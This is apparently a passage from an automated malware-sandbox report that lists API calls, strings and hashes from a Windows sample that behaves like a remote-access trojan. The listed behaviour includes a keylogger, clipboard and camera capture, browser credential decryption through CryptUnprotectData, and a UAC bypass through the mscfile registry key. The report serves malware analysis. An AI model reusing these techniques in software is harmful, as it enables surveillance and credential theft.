                          • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405120
                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                          Strings
                          • Connection KeepAlive | Disabled, xrefs: 004050D9
                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                          • String ID: Connection KeepAlive | Disabled
                          APIs
                          • Sleep.KERNEL32(00000000,?), ref: 004044A4
                            • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                          • API ID: H_prologSleep
                          • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                          APIs
                            • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                          • _free.LIBCMT ref: 00442318
                          • _free.LIBCMT ref: 0044232F
                          • _free.LIBCMT ref: 0044234E
                          • _free.LIBCMT ref: 00442369
                          • _free.LIBCMT ref: 00442380
                          • API ID: _free$AllocateHeap
                          • String ID:
                          APIs
                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                          • _free.LIBCMT ref: 004468EC
                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                          • _free.LIBCMT ref: 00446AB8
                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                          • String ID:
                          • API ID: _free
                          • String ID:
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00439ED1,?,00000000,?,00000001,?,?,00000001,00439ED1,?), ref: 0044E359
                          • __alloca_probe_16.LIBCMT ref: 0044E391
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044E3E2
                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00438C3F,?), ref: 0044E3F4
                          • __freea.LIBCMT ref: 0044E3FD
                            • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                          • String ID:
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
                            • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
                          • _free.LIBCMT ref: 0044C59F
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                          • String ID:
                          • API String ID: 336800556-0
                          APIs
                          • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1D7
                          • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1E3
                          • WriteFile.KERNEL32(00000000,00000000,00000000,0040649B,00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1F4
                          • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A201
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandle$CreatePointerWrite
                          • String ID:
                          • API String ID: 1852769593-0
                          APIs
                          • GetLastError.KERNEL32(?,00000000,?,00439A11,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004457AE
                          • _free.LIBCMT ref: 004457E3
                          • _free.LIBCMT ref: 0044580A
                          • SetLastError.KERNEL32(00000000), ref: 00445817
                          • SetLastError.KERNEL32(00000000), ref: 00445820
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$_free
                          • String ID:
                          • API String ID: 3170660625-0
                          APIs
                          • _free.LIBCMT ref: 00441566
                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                          • _free.LIBCMT ref: 00441578
                          • _free.LIBCMT ref: 0044158B
                          • _free.LIBCMT ref: 0044159C
                          • _free.LIBCMT ref: 004415AD
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          APIs
                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Enum$InfoQueryValue
                          • String ID: [regsplt]
                          • API String ID: 3554306468-4262303796
                          APIs
                          • _strpbrk.LIBCMT ref: 0044B918
                          • _free.LIBCMT ref: 0044BA35
                            • Part of subcall function 00439AA3: IsProcessorFeaturePresent.KERNEL32(00000017,00439A75,?,?,?,?,?,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000), ref: 00439AA5
                            • Part of subcall function 00439AA3: GetCurrentProcess.KERNEL32(C0000417), ref: 00439AC7
                            • Part of subcall function 00439AA3: TerminateProcess.KERNEL32(00000000), ref: 00439ACE
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                          • String ID: *?$.
                          • API String ID: 2812119850-3972193922
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 0040189E
                          • ExitThread.KERNEL32 ref: 004018D6
                          • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
                            • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                          • String ID: 8:G
                          • API String ID: 1649129571-405301104
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\RTdozXra.exe,00000104), ref: 00440975
                          • _free.LIBCMT ref: 00440A40
                          • _free.LIBCMT ref: 00440A4A
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$FileModuleName
                          • String ID: C:\Users\user\AppData\Roaming\RTdozXra.exe
                          • API String ID: 2506810119-1917151568
                          APIs
                            • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                            • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                            • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
                            • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                          • _wcslen.LIBCMT ref: 00419744
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                          • String ID: .exe$program files (x86)\$program files\
                          • API String ID: 37874593-1203593143
                          APIs
                          • CreateThread.KERNEL32(00000000,00000000,00409305,00472008,00000000,00000000), ref: 0040928B
                          • CreateThread.KERNEL32(00000000,00000000,004092EF,00472008,00000000,00000000), ref: 0040929B
                          • CreateThread.KERNEL32(00000000,00000000,00409311,00472008,00000000,00000000), ref: 004092A7
                            • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                            • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThread$LocalTimewsprintf
                          • String ID: Offline Keylogger Started
                          • API String ID: 465354869-4114347211
                          APIs
                          • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
                          • GetProcAddress.KERNEL32(00000000), ref: 00406097
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: CryptUnprotectData$crypt32
                          • API String ID: 2574300362-2380590389
                          APIs
                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                          • CloseHandle.KERNEL32(?), ref: 004051AA
                          • SetEvent.KERNEL32(?), ref: 004051B9
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandleObjectSingleWait
                          • String ID: Connection Timeout
                          • API String ID: 2055531096-499159329
                          APIs
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throw
                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                          • API String ID: 2005118841-1866435925
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                          • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                          • RegCloseKey.ADVAPI32(00000000), ref: 00412128
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: origmsc
                          • API String ID: 3677997916-68016026
                          APIs
                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell
                          • String ID: /C $cmd.exe$open
                          • API String ID: 587946157-3896048727
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                          • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00412054
                          Strings
                          • http\shell\open\command, xrefs: 00412026
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: http\shell\open\command
                          • API String ID: 3677997916-1487954565
                          APIs
                          • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,0046FB08), ref: 0041220F
                          • RegSetValueExW.ADVAPI32(0046FB08,00469654,00000000,00000000,00000000,00000000,00469654,?,80000001,?,0040674F,00469654,0046FB08), ref: 0041223E
                          • RegCloseKey.ADVAPI32(0046FB08,?,80000001,?,0040674F,00469654,0046FB08), ref: 00412249
                          Strings
                          • Software\Classes\mscfile\shell\open\command, xrefs: 0041220D
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateValue
                          • String ID: Software\Classes\mscfile\shell\open\command
                          • API String ID: 1818849710-505396733
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
                            • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
                            • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                          • String ID: bad locale name
                          • API String ID: 3628047217-1405518554
                          APIs
                          • RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                          • RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                          • RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateValue
                          • String ID: P0F
                          • API String ID: 1818849710-3540264436
                          APIs
                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                          • GetProcAddress.KERNEL32(00000000), ref: 00401403
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: GetCursorInfo$User32.dll
                          • API String ID: 1646373207-2714051624
                          APIs
                          • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                          • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetLastInputInfo$User32.dll
                          • API String ID: 2574300362-1519888992
                          APIs
                            • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                            • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                            • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                          • Sleep.KERNEL32(00000BB8), ref: 004111DF
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenQuerySleepValue
                          • String ID: H"G$exepath$!G
                          • API String ID: 4119054056-2148977334
                          • Opcode ID: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                          • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
                          • Opcode Fuzzy Hash: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                          • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
                          APIs
                            • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
                            • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
                            • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
                          • Sleep.KERNEL32(000001F4), ref: 0040955A
                          • Sleep.KERNEL32(00000064), ref: 004095F5
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Window$SleepText$ForegroundLength
                          • String ID: [ $ ]
                          • API String ID: 3309952895-93608704
                          • Opcode ID: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                          • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
                          • Opcode Fuzzy Hash: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                          • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
                          APIs
                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                          • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A23C
                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A261
                          • CloseHandle.KERNEL32(00000000,?,00000000,0040410F,00462E24), ref: 0041A26F
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleReadSize
                          • String ID:
                          • API String ID: 3919263394-0
                          • Opcode ID: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                          • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
                          • Opcode Fuzzy Hash: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                          • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
                          APIs
                          • __startOneArgErrorHandling.LIBCMT ref: 004401ED
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorHandling__start
                          • String ID: pow
                          • API String ID: 3213639722-2276729525
                          • Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                          • Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
                          • Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                          • Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                            • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                            • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                            • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                            • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                          • Sleep.KERNEL32(000000FA,00462E24), ref: 00404118
                          Strings
                          • /sort "Visit Time" /stext ", xrefs: 00404092
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                          • String ID: /sort "Visit Time" /stext "
                          • API String ID: 368326130-1573945896
                          • Opcode ID: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                          • Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
                          • Opcode Fuzzy Hash: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                          • Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99
                          APIs
                            • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                          • __Init_thread_footer.LIBCMT ref: 0040A6E3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Init_thread_footer__onexit
                          • String ID: [End of clipboard]$[Text copied to clipboard]
                          • API String ID: 1881088180-3686566968
                          • Opcode ID: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                          • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
                          • Opcode Fuzzy Hash: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                          • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
                          APIs
                          • GetLocalTime.KERNEL32(00000000), ref: 004194F4
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: LocalTime
                          • String ID: | $%02i:%02i:%02i:%03i
                          • API String ID: 481472006-2430845779
                          • Opcode ID: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                          • Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
                          • Opcode Fuzzy Hash: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                          • Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A
                          APIs
                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                          • API String ID: 1174141254-2800177040
                          • Opcode ID: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
                          • Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
                          • Opcode Fuzzy Hash: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
                          • Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9
                          APIs
                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                          • API String ID: 1174141254-4188645398
                          • Opcode ID: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
                          • Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
                          • Opcode Fuzzy Hash: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
                          • Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD
                          APIs
                          • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
                          Strings
                          Memory Dump Source
